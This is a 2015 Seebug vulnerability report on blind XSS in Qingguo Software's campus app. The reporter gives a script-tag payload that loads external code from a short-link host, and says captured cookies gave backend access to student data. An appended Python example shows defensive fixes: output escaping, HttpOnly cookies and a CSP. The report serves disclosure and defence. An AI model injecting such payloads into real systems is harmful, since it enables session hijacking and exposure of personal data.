Blind XSS in the 青果软件 (Qingguo Software) mobile app 掌上校园 reaches the admin backend and cookies

2015-11-10T00:00:00
ID SSV:95374
Type seebug
Reporter Root
Modified 2015-11-10T00:00:00

Description

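Brief description:

My submission was not accepted; they said a complete reproduction of the issue was required, which left me speechless..... Submitting it once more.

Detailed description:

Exploit code: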

<script src=http://t.cn/RUUNjzh></script>

<img src="https://images.seebug.org/upload/201511/101332027be52a70f1fa959e95be041b78629790.png" alt="IC_E5%SEZU3{PLSB@ET39RO.png" width="600">

The websites on the same IP do indeed belong to 湖南青果软件有限公司 (Hunan Qingguo Software Co., Ltd.):

<img src="https://images.seebug.org/upload/201511/1013403548187a4b752ef0eb97daded8f6ae6ad3.png" alt="3Q)YC4SLH43EZYSC@E)7X$P.png" width="600">

<img src="https://images.seebug.org/upload/201511/1013405368710c0ed012ddd7a3b75176eccf4d11.png" alt="XKO@WZG_4RPOYC`JHLFDYV9.png" width="600">

Proof of vulnerability:

<img src="https://images.seebug.org/upload/201511/10134224bd66a963107fa470e0aa691c9bc478f3.png" alt="3NTQQ0B71B1%Y)O6L1R%3V.png" width="600">

<img src="https://images.seebug.org/upload/201511/101343187fd9a31ae8eea7f5a2741542d3ac7281.png" alt="}Y@VEB$}PP@[U]7285F%X.png" width="600">

The cookies can be used to log in to the backend interface and view student data:

<img src="https://images.seebug.org/upload/201511/10134404ef5db826da6cb4f16380e7faa06b47db.png" alt="})ME3D~A~}NA(U9ZK%T%NGU.png" width="600">

This is the vulnerability code I submitted yesterday; in the page source you can clearly see the successfully inserted XSS code:

[<img src="https://images.seebug.org/upload/201511/10134823410ad6a77e41e49ee2b87237eea5569c.png" alt="1GSY}}XJ73WK]XRLGQTTKM4.png" width="600">](https://images.seebug.org/upload/201511/10134823410ad6a77e41e49ee2b87237eea5569c.png)
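
The chain shown in this report (app-submitted markup rendered unescaped in the backend, then session cookies read and replayed to log in) is broken by encoding at output time and by keeping the session cookie out of script reach. The following is an added example, not code from the report or from the vendor; the function names, the cookie name `session`, the CSP value and the sample submission are assumptions.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample input: same shape as the payload in the report (a script
# tag loading an external file); the URL is a placeholder.
SAMPLE_SUBMISSION = "<script src=http://example.invalid/x.js></script>"

# Restrictive policy for the backend pages (assumed value): even if markup
# slips through, the browser refuses to load script from another origin.
CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"


def render_submission(user_text: str) -> str:
    """Encode app-submitted text at output time, so it displays as text."""
    return '<td class="submission">' + html.escape(user_text, quote=True) + "</td>"


def session_cookie(session_id: str) -> str:
    """Build the Set-Cookie value for the backend session (cookie name assumed)."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True      # not readable through document.cookie
    jar["session"]["secure"] = True        # only sent over HTTPS
    jar["session"]["samesite"] = "Strict"  # not attached to cross-site requests
    jar["session"]["path"] = "/"
    return jar["session"].OutputString()


def backoffice_page(user_text: str, session_id: str):
    """Return (headers, body) for a backend page listing one submission."""
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),
        ("Content-Security-Policy", CSP),
        ("Set-Cookie", session_cookie(session_id)),
    ]
    body = "<table><tr>" + render_submission(user_text) + "</tr></table>"
    return headers, body


if __name__ == "__main__":
    hdrs, page = backoffice_page(SAMPLE_SUBMISSION, "constructed-session-id")
    for name, value in hdrs:
        print(f"{name}: {value}")
    print(page)
```

`HttpOnly` only keeps the cookie away from injected script; the output encoding is what stops the submitted tag from executing in the operator's browser at all.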